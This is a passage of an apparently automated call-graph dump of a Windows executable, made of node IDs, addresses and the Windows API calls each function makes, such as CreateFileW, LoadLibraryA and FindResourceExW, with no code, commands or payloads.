cc3ac 97723->97724 97780 dce17 22 API calls 97723->97780 97724->97655 97725->97652 97726->97650 97727->97656 97728->97665 97732 dfde0 97729->97732 97731 dfdfa 97731->97665 97732->97731 97734 dfdfc 97732->97734 97740 eea0c 97732->97740 97747 e4ead 7 API calls 97732->97747 97735 e066d 97734->97735 97748 e32a4 RaiseException 97734->97748 97749 e32a4 RaiseException 97735->97749 97738 e068a 97738->97665 97739->97665 97742 f3820 97740->97742 97741 f385e 97751 ef2d9 20 API calls 97741->97751 97742->97741 97743 f3849 RtlAllocateHeap 97742->97743 97750 e4ead 7 API calls 97742->97750 97743->97742 97745 f385c 97743->97745 97745->97732 97747->97732 97748->97735 97749->97738 97750->97742 97751->97745 97753 cae01 97752->97753 97756 cae1c 97752->97756 97825 caec9 97753->97825 97755 cae09 CharUpperBuffW 97755->97756 97756->97669 97758 cacae 97757->97758 97759 cacd1 97758->97759 97831 13359c 82 API calls 97758->97831 97759->97722 97762 10fadb 97761->97762 97763 cad92 97761->97763 97764 dfddb 22 API calls 97763->97764 97765 cad99 97764->97765 97832 cadcd 97765->97832 97768->97717 97769->97723 97772 dfddb 97770->97772 97771 eea0c 21 API calls 97771->97772 97772->97771 97773 dfdfa 97772->97773 97775 dfdfc 97772->97775 97845 e4ead 7 API calls 97772->97845 97773->97692 97776 e066d 97775->97776 97846 e32a4 RaiseException 97775->97846 97847 e32a4 RaiseException 97776->97847 97779 e068a 97779->97692 97780->97723 97781->97674 97782->97710 97783->97678 97784->97710 97785->97710 97786->97722 97787->97722 97788->97722 97789->97722 97790->97722 97791->97722 97813 cec76 97792->97813 97793 dfddb 22 API calls 97793->97813 97794 e00a3 29 API calls 97794->97813 97796 cfef7 97809 ced9d 97796->97809 97851 ca8c7 22 API calls 97796->97851 97798 114b0b 97853 13359c 82 API calls 97798->97853 97799 114600 97799->97809 97850 ca8c7 22 API calls 97799->97850 97803 ca8c7 22 API calls 97803->97813 97806 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97806->97813 97807 cfbe3 97807->97809 97810 114bdc 97807->97810 97815 cf3ae 97807->97815 97808 ca961 22 API calls 97808->97813 97809->97698 97854 13359c 82 API calls 97810->97854 97812 114beb 97855 13359c 82 API calls 97812->97855 97813->97793 97813->97794 97813->97796 97813->97798 97813->97799 97813->97803 97813->97806 97813->97807 97813->97808 97813->97809 97813->97812 97814 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97813->97814 97813->97815 97848 d01e0 207 API calls 97813->97848 97849 d06a0 41 API calls 97813->97849 97814->97813 97815->97809 97852 13359c 82 API calls 97815->97852 97817 ca826 97816->97817 97818 ca855 97817->97818 97856 ca993 41 API calls 97817->97856 97818->97700 97820->97710 97821->97707 97822->97708 97823->97718 97824->97710 97826 caedc 97825->97826 97827 caed9 97825->97827 97828 dfddb 22 API calls 97826->97828 97827->97755 97829 caee7 97828->97829 97830 dfe0b 22 API calls 97829->97830 97830->97827 97831->97759 97838 caddd 97832->97838 97833 cadb6 97833->97722 97834 dfddb 22 API calls 97834->97838 97837 cadcd 22 API calls 97837->97838 97838->97833 97838->97834 97838->97837 97839 ca961 97838->97839 97844 ca8c7 22 API calls 97838->97844 97840 dfe0b 22 API calls 97839->97840 97841 ca976 97840->97841 97842 dfddb 22 API calls 97841->97842 97843 ca984 97842->97843 97843->97838 97844->97838 97845->97772 97846->97776 97847->97779 97848->97813 97849->97813 97850->97809 97851->97809 97852->97809 97853->97809 97854->97812 97855->97809 97856->97818 97857 c1044 97862 c10f3 97857->97862 97859 c104a 97898 e00a3 29 API calls 97859->97898 97861 c1054 97899 c1398 97862->97899 97866 c116a 97867 ca961 22 API calls 97866->97867 97868 c1174 97867->97868 97869 ca961 22 API calls 97868->97869 97870 c117e 97869->97870 97871 ca961 22 API calls 97870->97871 97872 c1188 97871->97872 97873 ca961 22 API calls 97872->97873 97874 c11c6 97873->97874 97875 ca961 22 API calls 97874->97875 97876 c1292 97875->97876 97909 c171c 97876->97909 97880 c12c4 97881 ca961 22 API calls 97880->97881 97882 c12ce 97881->97882 97930 d1940 97882->97930 97884 c12f9 97940 c1aab 97884->97940 97886 c1315 97887 c1325 GetStdHandle 97886->97887 97888 102485 97887->97888 97889 c137a 97887->97889 97888->97889 97890 10248e 97888->97890 97892 c1387 OleInitialize 97889->97892 97891 dfddb 22 API calls 97890->97891 97893 102495 97891->97893 97892->97859 97947 13011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97893->97947 97895 10249e 97948 130944 CreateThread 97895->97948 97897 1024aa CloseHandle 97897->97889 97898->97861 97949 c13f1 97899->97949 97902 c13f1 22 API calls 97903 c13d0 97902->97903 97904 ca961 22 API calls 97903->97904 97905 c13dc 97904->97905 97956 c6b57 97905->97956 97907 c1129 97908 c1bc3 6 API calls 97907->97908 97908->97866 97910 ca961 22 API calls 97909->97910 97911 c172c 97910->97911 97912 ca961 22 API calls 97911->97912 97913 c1734 97912->97913 97914 ca961 22 API calls 97913->97914 97915 c174f 97914->97915 97916 dfddb 22 API calls 97915->97916 97917 c129c 97916->97917 97918 c1b4a 97917->97918 97919 c1b58 97918->97919 97920 ca961 22 API calls 97919->97920 97921 c1b63 97920->97921 97922 ca961 22 API calls 97921->97922 97923 c1b6e 97922->97923 97924 ca961 22 API calls 97923->97924 97925 c1b79 97924->97925 97926 ca961 22 API calls 97925->97926 97927 c1b84 97926->97927 97928 dfddb 22 API calls 97927->97928 97929 c1b96 RegisterWindowMessageW 97928->97929 97929->97880 97931 d1981 97930->97931 97938 d195d 97930->97938 97973 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97931->97973 97933 d196e 97933->97884 97934 d198b 97934->97938 97974 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97934->97974 97936 d8727 97936->97933 97976 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97936->97976 97938->97933 97975 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97938->97975 97941 c1abb 97940->97941 97942 10272d 97940->97942 97943 dfddb 22 API calls 97941->97943 97977 133209 23 API calls 97942->97977 97945 c1ac3 97943->97945 97945->97886 97946 102738 97947->97895 97948->97897 97978 13092a 28 API calls 97948->97978 97950 ca961 22 API calls 97949->97950 97951 c13fc 97950->97951 97952 ca961 22 API calls 97951->97952 97953 c1404 97952->97953 97954 ca961 22 API calls 97953->97954 97955 c13c6 97954->97955 97955->97902 97957 104ba1 97956->97957 97958 c6b67 97956->97958 97969 c93b2 97957->97969 97961 c6b7d 97958->97961 97962 c6ba2 97958->97962 97960 104baa 97960->97960 97968 c6f34 22 API calls 97961->97968 97964 dfddb 22 API calls 97962->97964 97966 c6bae 97964->97966 97965 c6b85 97965->97907 97967 dfe0b 22 API calls 97966->97967 97967->97965 97968->97965 97970 c93c0 97969->97970 97972 c93c9 97969->97972 97971 caec9 22 API calls 97970->97971 97970->97972 97971->97972 97972->97960 97973->97934 97974->97938 97975->97936 97976->97933 97977->97946 97979 cdee5 97982 cb710 97979->97982 97983 cb72b 97982->97983 97984 110146 97983->97984 97985 1100f8 97983->97985 98007 cb750 97983->98007 98013 1458a2 97984->98013 97988 110102 97985->97988 97991 11010f 97985->97991 97985->98007 98052 145d33 207 API calls 97988->98052 98003 cba20 97991->98003 98053 1461d0 207 API calls 97991->98053 97994 1103d9 97994->97994 97995 dd336 40 API calls 97995->98007 97998 cba4e 98000 110322 98057 145c0c 82 API calls 98000->98057 98003->97998 98058 13359c 82 API calls 98003->98058 98004 ca81b 41 API calls 98004->98007 98007->97995 98007->97998 98007->98000 98007->98003 98007->98004 98009 cbbe0 40 API calls 98007->98009 98010 cec40 207 API calls 98007->98010 98036 dd2f0 98007->98036 98042 da01b 207 API calls 98007->98042 98043 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98007->98043 98044 dedcd 22 API calls 98007->98044 98045 e00a3 29 API calls 98007->98045 98046 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98007->98046 98047 dee53 98007->98047 98051 de5ca 207 API calls 98007->98051 98054 caceb 23 API calls 98007->98054 98055 11f6bf 23 API calls 98007->98055 98056 ca8c7 22 API calls 98007->98056 98009->98007 98010->98007 98014 1458e1 98013->98014 98015 1458cb 98013->98015 98029 145935 98014->98029 98060 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98014->98060 98015->98014 98016 1458d0 98015->98016 98059 145d33 207 API calls 98016->98059 98019 1458dc 98019->98007 98020 145906 98020->98029 98061 dedcd 22 API calls 98020->98061 98021 dd2f0 40 API calls 98021->98029 98023 145aa8 98067 13359c 82 API calls 98023->98067 98025 14591f 98062 e00a3 29 API calls 98025->98062 98026 ca81b 41 API calls 98026->98029 98028 145929 98063 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98028->98063 98029->98019 98029->98021 98029->98023 98029->98026 98032 dee53 82 API calls 98029->98032 98034 cec40 207 API calls 98029->98034 98064 da01b 207 API calls 98029->98064 98065 145c0c 82 API calls 98029->98065 98066 de5ca 207 API calls 98029->98066 98032->98029 98034->98029 98038 dd329 98036->98038 98041 dd2fc 98036->98041 98037 dd321 98037->98007 98038->98041 98069 dd336 40 API calls 98038->98069 98041->98037 98068 dd336 40 API calls 98041->98068 98042->98007 98043->98007 98044->98007 98045->98007 98046->98007 98048 dee70 98047->98048 98050 deeb8 98047->98050 98048->98050 98070 13359c 82 API calls 98048->98070 98050->98007 98051->98007 98052->97991 98053->98003 98054->98007 98055->98007 98056->98007 98057->98003 98058->97994 98059->98019 98060->98020 98061->98025 98062->98028 98063->98029 98064->98029 98065->98029 98066->98029 98067->98019 98068->98037 98069->98041 98070->98050 98071 f8402 98076 f81be 98071->98076 98074 f842a 98081 f81ef 98076->98081 98078 f83ee 98095 f27ec 26 API calls 98078->98095 98080 f8343 98080->98074 98088 100984 98080->98088 98084 f8338 98081->98084 98091 e8e0b 40 API calls 98081->98091 98083 f838c 98083->98084 98092 e8e0b 40 API calls 98083->98092 98084->98080 98094 ef2d9 20 API calls 98084->98094 98086 f83ab 98086->98084 98093 e8e0b 40 API calls 98086->98093 98096 100081 98088->98096 98090 10099f 98090->98074 98091->98083 98092->98086 98093->98084 98094->98078 98095->98080 98098 10008d 98096->98098 98097 10009b 98154 ef2d9 20 API calls 98097->98154 98098->98097 98101 1000d4 98098->98101 98100 1000a0 98155 f27ec 26 API calls 98100->98155 98107 10065b 98101->98107 98106 1000aa 98106->98090 98157 10042f 98107->98157 98110 1006a6 98175 f5221 98110->98175 98111 10068d 98189 ef2c6 20 API calls 98111->98189 98114 1006ab 98115 1006b4 98114->98115 98116 1006cb 98114->98116 98191 ef2c6 20 API calls 98115->98191 98188 10039a CreateFileW 98116->98188 98120 1006b9 98192 ef2d9 20 API calls 98120->98192 98121 100704 98123 100781 GetFileType 98121->98123 98125 100756 GetLastError 98121->98125 98193 10039a CreateFileW 98121->98193 98124 10078c GetLastError 98123->98124 98128 1007d3 98123->98128 98195 ef2a3 20 API calls 98124->98195 98194 ef2a3 20 API calls 98125->98194 98197 f516a 21 API calls 98128->98197 98129 100692 98190 ef2d9 20 API calls 98129->98190 98130 10079a CloseHandle 98130->98129 98132 1007c3 98130->98132 98196 ef2d9 20 API calls 98132->98196 98134 100749 98134->98123 98134->98125 98136 1007f4 98137 100840 98136->98137 98198 1005ab 72 API calls 98136->98198 98142 10086d 98137->98142 98199 10014d 72 API calls 98137->98199 98138 1007c8 98138->98129 98141 100866 98141->98142 98143 10087e 98141->98143 98200 f86ae 98142->98200 98145 1000f8 98143->98145 98146 1008fc CloseHandle 98143->98146 98156 100121 LeaveCriticalSection 98145->98156 98215 10039a CreateFileW 98146->98215 98148 100927 98149 100931 GetLastError 98148->98149 98150 10095d 98148->98150 98216 ef2a3 20 API calls 98149->98216 98150->98145 98152 10093d 98217 f5333 21 API calls 98152->98217 98154->98100 98155->98106 98156->98106 98158 100450 98157->98158 98159 10046a 98157->98159 98158->98159 98225 ef2d9 20 API calls 98158->98225 98218 1003bf 98159->98218 98162 10045f 98226 f27ec 26 API calls 98162->98226 98164 1004a2 98165 1004d1 98164->98165 98227 ef2d9 20 API calls 98164->98227 98172 100524 98165->98172 98229 ed70d 26 API calls 98165->98229 98168 10051f 98170 10059e 98168->98170 98168->98172 98169 1004c6 98228 f27ec 26 API calls 98169->98228 98230 f27fc 11 API calls 98170->98230 98172->98110 98172->98111 98174 1005aa 98176 f522d 98175->98176 98233 f2f5e EnterCriticalSection 98176->98233 98178 f5234 98179 f5259 98178->98179 98184 f52c7 EnterCriticalSection 98178->98184 98185 f527b 98178->98185 98237 f5000 98179->98237 98182 f52a4 98182->98114 98184->98185 98186 f52d4 LeaveCriticalSection 98184->98186 98234 f532a 98185->98234 98186->98178 98188->98121 98189->98129 98190->98145 98191->98120 98192->98129 98193->98134 98194->98129 98195->98130 98196->98138 98197->98136 98198->98137 98199->98141 98263 f53c4 98200->98263 98202 f86c4 98276 f5333 21 API calls 98202->98276 98204 f86be 98204->98202 98207 f53c4 26 API calls 98204->98207 98214 f86f6 98204->98214 98205 f53c4 26 API calls 98208 f8702 CloseHandle 98205->98208 98206 f871c 98212 f873e 98206->98212 98277 ef2a3 20 API calls 98206->98277 98209 f86ed 98207->98209 98208->98202 98210 f870e GetLastError 98208->98210 98213 f53c4 26 API calls 98209->98213 98210->98202 98212->98145 98213->98214 98214->98202 98214->98205 98215->98148 98216->98152 98217->98150 98220 1003d7 98218->98220 98219 1003f2 98219->98164 98220->98219 98231 ef2d9 20 API calls 98220->98231 98222 100416 98232 f27ec 26 API calls 98222->98232 98224 100421 98224->98164 98225->98162 98226->98159 98227->98169 98228->98165 98229->98168 98230->98174 98231->98222 98232->98224 98233->98178 98245 f2fa6 LeaveCriticalSection 98234->98245 98236 f5331 98236->98182 98246 f4c7d 98237->98246 98239 f5012 98243 f501f 98239->98243 98253 f3405 11 API calls 98239->98253 98241 f5071 98241->98185 98244 f5147 EnterCriticalSection 98241->98244 98254 f29c8 98243->98254 98244->98185 98245->98236 98251 f4c8a 98246->98251 98247 f4cca 98261 ef2d9 20 API calls 98247->98261 98248 f4cb5 RtlAllocateHeap 98249 f4cc8 98248->98249 98248->98251 98249->98239 98251->98247 98251->98248 98260 e4ead 7 API calls 98251->98260 98253->98239 98255 f29d3 RtlFreeHeap 98254->98255 98256 f29fc 98254->98256 98255->98256 98257 f29e8 98255->98257 98256->98241 98262 ef2d9 20 API calls 98257->98262 98259 f29ee GetLastError 98259->98256 98260->98251 98261->98249 98262->98259 98264 f53d1 98263->98264 98267 f53e6 98263->98267 98278 ef2c6 20 API calls 98264->98278 98266 f53d6 98279 ef2d9 20 API calls 98266->98279 98270 f540b 98267->98270 98280 ef2c6 20 API calls 98267->98280 98270->98204 98271 f5416 98281 ef2d9 20 API calls 98271->98281 98272 f53de 98272->98204 98274 f541e 98282 f27ec 26 API calls 98274->98282 98276->98206 98277->98212 98278->98266 98279->98272 98280->98271 98281->98274 98282->98272 98283 c2de3 98284 c2df0 98283->98284 98285 c2e09 98284->98285 98286 102c2b 98284->98286 98299 c3aa2 98285->98299 98288 102c47 GetOpenFileNameW 98286->98288 98290 102c96 98288->98290 98293 c6b57 22 API calls 98290->98293 98295 102cab 98293->98295 98295->98295 98296 c2e27 98327 c44a8 98296->98327 98357 101f50 98299->98357 98302 c3ace 98304 c6b57 22 API calls 98302->98304 98303 c3ae9 98363 ca6c3 98303->98363 98306 c3ada 98304->98306 98359 c37a0 98306->98359 98309 c2da5 98310 101f50 98309->98310 98311 c2db2 GetLongPathNameW 98310->98311 98312 c6b57 22 API calls 98311->98312 98313 c2dda 98312->98313 98314 c3598 98313->98314 98315 ca961 22 API calls 98314->98315 98316 c35aa 98315->98316 98317 c3aa2 23 API calls 98316->98317 98318 c35b5 98317->98318 98319 1032eb 98318->98319 98320 c35c0 98318->98320 98326 10330d 98319->98326 98381 dce60 41 API calls 98319->98381 98369 c515f 98320->98369 98325 c35df 98325->98296 98382 c4ecb 98327->98382 98330 103833 98404 132cf9 98330->98404 98331 c4ecb 94 API calls 98333 c44e1 98331->98333 98333->98330 98335 c44e9 98333->98335 98334 103848 98336 103869 98334->98336 98337 10384c 98334->98337 98339 103854 98335->98339 98340 c44f5 98335->98340 98338 dfe0b 22 API calls 98336->98338 98445 c4f39 98337->98445 98356 1038ae 98338->98356 98451 12da5a 82 API calls 98339->98451 98444 c940c 136 API calls 98340->98444 98344 c2e31 98345 103862 98345->98336 98346 103a5f 98348 103a67 98346->98348 98347 c4f39 68 API calls 98347->98348 98348->98347 98455 12989b 82 API calls 98348->98455 98353 c9cb3 22 API calls 98353->98356 98356->98346 98356->98348 98356->98353 98430 ca4a1 98356->98430 98438 c3ff7 98356->98438 98452 12967e 22 API calls 98356->98452 98453 1295ad 42 API calls 98356->98453 98454 130b5a 22 API calls 98356->98454 98358 c3aaf GetFullPathNameW 98357->98358 98358->98302 98358->98303 98360 c37ae 98359->98360 98361 c93b2 22 API calls 98360->98361 98362 c2e12 98361->98362 98362->98309 98364 ca6dd 98363->98364 98368 ca6d0 98363->98368 98365 dfddb 22 API calls 98364->98365 98366 ca6e7 98365->98366 98367 dfe0b 22 API calls 98366->98367 98367->98368 98368->98306 98370 c516e 98369->98370 98374 c518f 98369->98374 98372 dfe0b 22 API calls 98370->98372 98371 dfddb 22 API calls 98373 c35cc 98371->98373 98372->98374 98375 c35f3 98373->98375 98374->98371 98376 c3605 98375->98376 98380 c3624 98375->98380 98379 dfe0b 22 API calls 98376->98379 98377 dfddb 22 API calls 98378 c363b 98377->98378 98378->98325 98379->98380 98380->98377 98381->98319 98456 c4e90 LoadLibraryA 98382->98456 98387 c4ef6 LoadLibraryExW 98464 c4e59 LoadLibraryA 98387->98464 98388 103ccf 98389 c4f39 68 API calls 98388->98389 98392 103cd6 98389->98392 98394 c4e59 3 API calls 98392->98394 98396 103cde 98394->98396 98395 c4f20 98395->98396 98397 c4f2c 98395->98397 98486 c50f5 98396->98486 98398 c4f39 68 API calls 98397->98398 98400 c44cd 98398->98400 98400->98330 98400->98331 98403 103d05 98405 132d15 98404->98405 98406 c511f 64 API calls 98405->98406 98407 132d29 98406->98407 98620 132e66 98407->98620 98410 c50f5 40 API calls 98411 132d56 98410->98411 98412 c50f5 40 API calls 98411->98412 98413 132d66 98412->98413 98414 c50f5 40 API calls 98413->98414 98415 132d81 98414->98415 98416 c50f5 40 API calls 98415->98416 98417 132d9c 98416->98417 98418 c511f 64 API calls 98417->98418 98419 132db3 98418->98419 98420 eea0c 21 API calls 98419->98420 98421 132dba 98420->98421 98422 eea0c 21 API calls 98421->98422 98423 132dc4 98422->98423 98424 c50f5 40 API calls 98423->98424 98425 132dd8 98424->98425 98426 1328fe 27 API calls 98425->98426 98428 132dee 98426->98428 98427 132d3f 98427->98334 98428->98427 98626 1322ce 98428->98626 98431 ca52b 98430->98431 98437 ca4b1 98430->98437 98433 dfe0b 22 API calls 98431->98433 98432 dfddb 22 API calls 98434 ca4b8 98432->98434 98433->98437 98435 dfddb 22 API calls 98434->98435 98436 ca4d6 98434->98436 98435->98436 98436->98356 98437->98432 98439 c40ae 98438->98439 98440 c400a 98438->98440 98439->98356 98441 dfe0b 22 API calls 98440->98441 98442 c403c 98440->98442 98441->98442 98442->98439 98443 dfddb 22 API calls 98442->98443 98443->98442 98444->98344 98446 c4f4a 98445->98446 98447 c4f43 98445->98447 98449 c4f59 98446->98449 98450 c4f6a FreeLibrary 98446->98450 98448 ee678 67 API calls 98447->98448 98448->98446 98449->98339 98450->98449 98451->98345 98452->98356 98453->98356 98454->98356 98455->98348 98457 c4ea8 GetProcAddress 98456->98457 98458 c4ec6 98456->98458 98459 c4eb8 98457->98459 98461 ee5eb 98458->98461 98459->98458 98460 c4ebf FreeLibrary 98459->98460 98460->98458 98494 ee52a 98461->98494 98463 c4eea 98463->98387 98463->98388 98465 c4e8d 98464->98465 98466 c4e6e GetProcAddress 98464->98466 98469 c4f80 98465->98469 98467 c4e7e 98466->98467 98467->98465 98468 c4e86 FreeLibrary 98467->98468 98468->98465 98470 dfe0b 22 API calls 98469->98470 98471 c4f95 98470->98471 98546 c5722 98471->98546 98473 c4fa1 98474 c50a5 98473->98474 98475 103d1d 98473->98475 98485 c4fdc 98473->98485 98549 c42a2 CreateStreamOnHGlobal 98474->98549 98560 13304d 74 API calls 98475->98560 98478 103d22 98480 c511f 64 API calls 98478->98480 98479 c50f5 40 API calls 98479->98485 98481 103d45 98480->98481 98482 c50f5 40 API calls 98481->98482 98483 c506e 98482->98483 98483->98395 98485->98478 98485->98479 98485->98483 98555 c511f 98485->98555 98487 103d70 98486->98487 98488 c5107 98486->98488 98582 ee8c4 98488->98582 98491 1328fe 98603 13274e 98491->98603 98493 132919 98493->98403 98496 ee536 98494->98496 98495 ee544 98519 ef2d9 20 API calls 98495->98519 98496->98495 98499 ee574 98496->98499 98498 ee549 98520 f27ec 26 API calls 98498->98520 98501 ee579 98499->98501 98502 ee586 98499->98502 98521 ef2d9 20 API calls 98501->98521 98511 f8061 98502->98511 98505 ee58f 98506 ee595 98505->98506 98507 ee5a2 98505->98507 98522 ef2d9 20 API calls 98506->98522 98523 ee5d4 LeaveCriticalSection 98507->98523 98508 ee554 98508->98463 98512 f806d 98511->98512 98524 f2f5e EnterCriticalSection 98512->98524 98514 f807b 98525 f80fb 98514->98525 98518 f80ac 98518->98505 98519->98498 98520->98508 98521->98508 98522->98508 98523->98508 98524->98514 98532 f811e 98525->98532 98526 f8177 98527 f4c7d 20 API calls 98526->98527 98528 f8180 98527->98528 98530 f29c8 20 API calls 98528->98530 98531 f8189 98530->98531 98537 f8088 98531->98537 98543 f3405 11 API calls 98531->98543 98532->98526 98532->98532 98532->98537 98541 e918d EnterCriticalSection 98532->98541 98542 e91a1 LeaveCriticalSection 98532->98542 98534 f81a8 98544 e918d EnterCriticalSection 98534->98544 98538 f80b7 98537->98538 98545 f2fa6 LeaveCriticalSection 98538->98545 98540 f80be 98540->98518 98541->98532 98542->98532 98543->98534 98544->98537 98545->98540 98547 dfddb 22 API calls 98546->98547 98548 c5734 98547->98548 98548->98473 98550 c42bc FindResourceExW 98549->98550 98554 c42d9 98549->98554 98551 1035ba LoadResource 98550->98551 98550->98554 98552 1035cf SizeofResource 98551->98552 98551->98554 98553 1035e3 LockResource 98552->98553 98552->98554 98553->98554 98554->98485 98556 103d90 98555->98556 98557 c512e 98555->98557 98561 eece3 98557->98561 98560->98478 98564 eeaaa 98561->98564 98563 c513c 98563->98485 98565 eeab6 98564->98565 98566 eeac2 98565->98566 98567 eeae8 98565->98567 98577 ef2d9 20 API calls 98566->98577 98579 e918d EnterCriticalSection 98567->98579 98570 eeac7 98578 f27ec 26 API calls 98570->98578 98572 eeaf4 98580 eec0a 62 API calls 98572->98580 98574 eeb08 98581 eeb27 LeaveCriticalSection 98574->98581 98576 eead2 98576->98563 98577->98570 98578->98576 98579->98572 98580->98574 98581->98576 98585 ee8e1 98582->98585 98584 c5118 98584->98491 98586 ee8ed 98585->98586 98587 ee92d 98586->98587 98588 ee900 98586->98588 98589 ee925 98586->98589 98600 e918d EnterCriticalSection 98587->98600 98598 ef2d9 20 API calls 98588->98598 98589->98584 98591 ee937 98601 ee6f8 38 API calls 98591->98601 98594 ee91a 98599 f27ec 26 API calls 98594->98599 98595 ee94e 98602 ee96c LeaveCriticalSection 98595->98602 98598->98594 98599->98589 98600->98591 98601->98595 98602->98589 98606 ee4e8 98603->98606 98605 13275d 98605->98493 98609 ee469 98606->98609 98608 ee505 98608->98605 98610 ee478 98609->98610 98612 ee48c 98609->98612 98617 ef2d9 20 API calls 98610->98617 98616 ee488 98612->98616 98619 f333f 11 API calls 98612->98619 98613 ee47d 98618 f27ec 26 API calls 98613->98618 98616->98608 98617->98613 98618->98616 98619->98616 98625 132e7a 98620->98625 98621 c50f5 40 API calls 98621->98625 98622 132d3b 98622->98410 98622->98427 98623 1328fe 27 API calls 98623->98625 98624 c511f 64 API calls 98624->98625 98625->98621 98625->98622 98625->98623 98625->98624 98627 1322d9 98626->98627 98628 1322e7 98626->98628 98629 ee5eb 29 API calls 98627->98629 98630 13232c 98628->98630 98631 ee5eb 29 API calls 98628->98631 98654 1322f0 98628->98654 98629->98628 98655 132557 40 API calls 98630->98655 98632 132311 98631->98632 98632->98630 98634 13231a 98632->98634 98634->98654 98663 ee678 98634->98663 98635 132370 98636 132395 98635->98636 98637 132374 98635->98637 98656 132171 98636->98656 98640 132381 98637->98640 98642 ee678 67 API calls 98637->98642 98643 ee678 67 API calls 98640->98643 98640->98654 98641 13239d 98644 1323c3 98641->98644 98645 1323a3 98641->98645 98642->98640 98643->98654 98676 1323f3 74 API calls 98644->98676 98647 1323b0 98645->98647 98648 ee678 67 API calls 98645->98648 98649 ee678 67 API calls 98647->98649 98647->98654 98648->98647 98649->98654 98650 1323ca 98651 1323de 98650->98651 98652 ee678 67 API calls 98650->98652 98653 ee678 67 API calls 98651->98653 98651->98654 98652->98651 98653->98654 98654->98427 98655->98635 98657 eea0c 21 API calls 98656->98657 98658 13217f 98657->98658 98659 eea0c 21 API calls 98658->98659 98660 132190 98659->98660 98661 eea0c 21 API calls 98660->98661 98662 13219c 98661->98662 98662->98641 98664 ee684 98663->98664 98665 ee6aa 98664->98665 98666 ee695 98664->98666 98675 ee6a5 98665->98675 98677 e918d EnterCriticalSection 98665->98677 98694 ef2d9 20 API calls 98666->98694 98668 ee69a 98695 f27ec 26 API calls 98668->98695 98671 ee6c6 98678 ee602 98671->98678 98673 ee6d1 98696 ee6ee LeaveCriticalSection 98673->98696 98675->98654 98676->98650 98677->98671 98679 ee60f 98678->98679 98680 ee624 98678->98680 98729 ef2d9 20 API calls 98679->98729 98686 ee61f 98680->98686 98697 edc0b 98680->98697 98682 ee614 98730 f27ec 26 API calls 98682->98730 98686->98673 98690 ee646 98714 f862f 98690->98714 98693 f29c8 20 API calls 98693->98686 98694->98668 98695->98675 98696->98675 98698 edc23 98697->98698 98702 edc1f 98697->98702 98699 ed955 26 API calls 98698->98699 98698->98702 98700 edc43 98699->98700 98731 f59be 62 API calls 98700->98731 98703 f4d7a 98702->98703 98704 ee640 98703->98704 98705 f4d90 98703->98705 98707 ed955 98704->98707 98705->98704 98706 f29c8 20 API calls 98705->98706 98706->98704 98708 ed976 98707->98708 98709 ed961 98707->98709 98708->98690 98732 ef2d9 20 API calls 98709->98732 98711 ed966 98733 f27ec 26 API calls 98711->98733 98713 ed971 98713->98690 98715 f863e 98714->98715 98716 f8653 98714->98716 98737 ef2c6 20 API calls 98715->98737 98718 f868e 98716->98718 98723 f867a 98716->98723 98739 ef2c6 20 API calls 98718->98739 98719 f8643 98738 ef2d9 20 API calls 98719->98738 98721 f8693 98740 ef2d9 20 API calls 98721->98740 98734 f8607 98723->98734 98726 f869b 98741 f27ec 26 API calls 98726->98741 98727 ee64c 98727->98686 98727->98693 98729->98682 98730->98686 98731->98702 98732->98711 98733->98713 98742 f8585 98734->98742 98736 f862b 98736->98727 98737->98719 98738->98727 98739->98721 98740->98726 98741->98727 98743 f8591 98742->98743 98753 f5147 EnterCriticalSection 98743->98753 98745 f859f 98746 f85c6 98745->98746 98747 f85d1 98745->98747 98748 f86ae 29 API calls 98746->98748 98754 ef2d9 20 API calls 98747->98754 98750 f85cc 98748->98750 98755 f85fb LeaveCriticalSection 98750->98755 98752 f85ee 98752->98736 98753->98745 98754->98750 98755->98752 98756 113a41 98760 1310c0 98756->98760 98758 113a4c 98759 1310c0 53 API calls 98758->98759 98759->98758 98765 1310cd 98760->98765 98770 1310fa 98760->98770 98761 1310fc 98804 dfa11 53 API calls 98761->98804 98763 131101 98771 c7510 98763->98771 98765->98761 98765->98763 98768 1310f4 98765->98768 98765->98770 98803 cb270 39 API calls 98768->98803 98770->98758 98772 c7525 98771->98772 98773 c7522 98771->98773 98774 c752d 98772->98774 98775 c755b 98772->98775 98794 c6350 98773->98794 98805 e51c6 26 API calls 98774->98805 98777 1050f6 98775->98777 98778 c756d 98775->98778 98785 10500f 98775->98785 98814 e5183 26 API calls 98777->98814 98812 dfb21 51 API calls 98778->98812 98779 c753d 98784 dfddb 22 API calls 98779->98784 98782 10510e 98782->98782 98786 c7547 98784->98786 98787 105088 98785->98787 98789 dfe0b 22 API calls 98785->98789 98806 c9cb3 98786->98806 98813 dfb21 51 API calls 98787->98813 98790 105058 98789->98790 98791 dfddb 22 API calls 98790->98791 98792 10507f 98791->98792 98793 c9cb3 22 API calls 98792->98793 98793->98787 98795 104a51 98794->98795 98796 c6362 98794->98796 98825 c4a88 22 API calls 98795->98825 98815 c6373 98796->98815 98799 c636e 98799->98770 98800 104a5b 98802 104a67 98800->98802 98826 ca8c7 22 API calls 98800->98826 98803->98770 98804->98763 98805->98779 98807 c9cc2 98806->98807 98808 dfe0b 22 API calls 98807->98808 98809 c9cea 98808->98809 98810 dfddb 22 API calls 98809->98810 98811 c9d00 98810->98811 98811->98773 98812->98779 98813->98777 98814->98782 98816 c6382 98815->98816 98821 c63b6 98815->98821 98817 104a82 98816->98817 98818 c63a9 98816->98818 98816->98821 98820 dfddb 22 API calls 98817->98820 98827 ca587 98818->98827 98822 104a91 98820->98822 98821->98799 98823 dfe0b 22 API calls 98822->98823 98824 104ac5 98823->98824 98825->98800 98826->98802 98828 ca59d 98827->98828 98831 ca598 98827->98831 98829 dfe0b 22 API calls 98828->98829 98830 10f80f 